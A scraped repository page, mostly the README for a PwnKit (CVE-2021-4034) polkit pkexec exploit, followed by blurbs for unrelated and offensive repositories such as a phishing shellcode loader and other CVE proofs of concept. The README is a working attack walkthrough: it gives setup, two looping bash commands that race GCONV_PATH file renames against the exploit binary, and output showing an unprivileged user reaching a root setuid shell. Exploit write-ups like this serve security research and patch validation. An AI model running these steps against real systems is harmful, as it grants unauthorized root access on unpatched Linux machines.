Exploit for the pwnkit vulnerability from the Qualys team

Overview

CVE-2021-4034

Exploit for the pwnkit vulnerability from the Qualys team.

This exploit assumes that gcc is present on the target machine.

$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

Run the following command in one bash session:

while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

Run the following command in another bash session:

while :; do ./exploit; done

You will eventually win the race and obtain a shell binary that gives you root access:

$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
You might also like...
Servo library with stm developed by the Liek Software Team. We are working on new versions.

Liek-Servo-Library Liek Servo Library is a library that makes it easy for you to drive servo motors with STM32F10x series cards. The library is still

Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.

Overview Matryoshka loader is a tool that red team operators can leverage to generate shellcode for an egghunter to bypass size-limitations and perfor

Team hashcat event writeups and tools

Team hashcat event writeups and tools We're a group of people participating in the yearly repeating password cracking contests. Achievements Competiti

Software Running on the VEX V5 Brain for the USF IEEE VEX Robotics Team.

This is an ongoing Project at USF IEEE VEX Team for VEX Head-to-Head 2022 This is the software running on our USF Big-Bull-Bot, specified to compete i

Team 3's final project for ECE 485/585 F'21

ECE585_Team3 Team 3's final project for ECE 485/585 F'21 Braden Harwood, Stephen Short, Michael Weston, Drew Seidel *Information sourced from Dr. Faus

This is a product / project developed by a team of Five Members including Mithilesh Ghadge for the Engineering Clinics at Vellore Institute Of Technology

UltrasonicSensorGlasses-for-blind-people This is a product / project developed by a team of Five Members including Mithilesh Ghadge for the Engineerin

2021 ICPC Seoul Regional White Whale team note

icpc-team-note 2021 ICPC Seoul Regional White Whale team note 커밋 규칙 반드시 algorithms 폴더 아래에 각자의 소스 파일 .cpp을 넣는다. 이름: 알고리즘 명칭 이렇게 하면 충돌이 없다! Fork / Branc

bl_mcu_sdk is MCU software development kit provided by Bouffalo Lab Team for BL602/BL604, BL702/BL704/BL706 and other series of  RISC-V based chips in the future.
bl_mcu_sdk is MCU software development kit provided by Bouffalo Lab Team for BL602/BL604, BL702/BL704/BL706 and other series of RISC-V based chips in the future.

bl mcu sdk is an MCU software development kit provided by the Bouffalo Lab Team for BL602/BL604, BL702/BL704/BL706 and other series of chips in the future

This repo contains information about EDRs that can be useful during red team exercise.

EDRs This repo contains information about EDRs that can be useful during red team exercise. patch_syscall_dynamically64.c This proof-of-concept is res

Owner
Terry Chia
Terry Chia
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 924 Nov 21, 2022
An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec

CVE-2021-4034 Exploit Usage $ git clone https://github.com/whokilleddb/CVE-2021-4034 $ cd CVE-2021-4034 $ make [!] CVE-2021-4034 Exploit By whokilledd

whokilleddb 3 Jun 30, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 433 Nov 30, 2022
Some hypervisor research notes. There is also a useful exploit template that you can use to verify / falsify any assumptions you may make while auditing code, and for exploit development.

Introduction Over the past few weeks, I've been doing some hypervisor research here and there, with most of my focus being on PCI device emulation cod

Faith 130 Nov 18, 2022
PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.

CVE-2021-28476: a guest-to-host "Microsoft Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. This is a proof of concept for CVE-2021-28476

Axel Souchet 208 Nov 26, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 432 Nov 24, 2022
struct_san is a vulnerability prevention tool that dynamically detects function pointers in kernel structures

struct_san - struct sanitizer 简介 struct_san是一个动态检测内核结构体函数指针的漏洞防御工具。业界对于结构体函数指针的保护主要集中在 Control-Flow Integrity (CFI),也就是关注在控制流上,没有关注在数据流上,例如某些CFI验证函数指针

YunDing Security Lab 22 Nov 24, 2022
Vulnerability Exploitation Code Collection Repository

Introduction expbox is an exploit code collection repository List Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution curl -i -s -k -X $'POST' -H $'Hos

0x0021h 263 Feb 14, 2022
Log4j Vulnerability Scanner for Windows

THIS SCRIPT IS PROVIDED TO YOU "AS IS." TO THE EXTENT PERMITTED BY LAW, QUALYS HEREBY DISCLAIMS ALL WARRANTIES AND LIABILITY FOR THE PROVISION OR USE

Qualys, Inc. 151 Nov 7, 2022
TAFuzzer: Effective and Efficient Targeted Fuzzing framework for Smart Contract Vulnerability Detection (CCS2022a Under Review).

TAFuzzer An effective and efficient targeted fuzzing framework for smart contract vulnerability detection. Requirements TAFuzzer is supported on Linux

null 2 Feb 7, 2022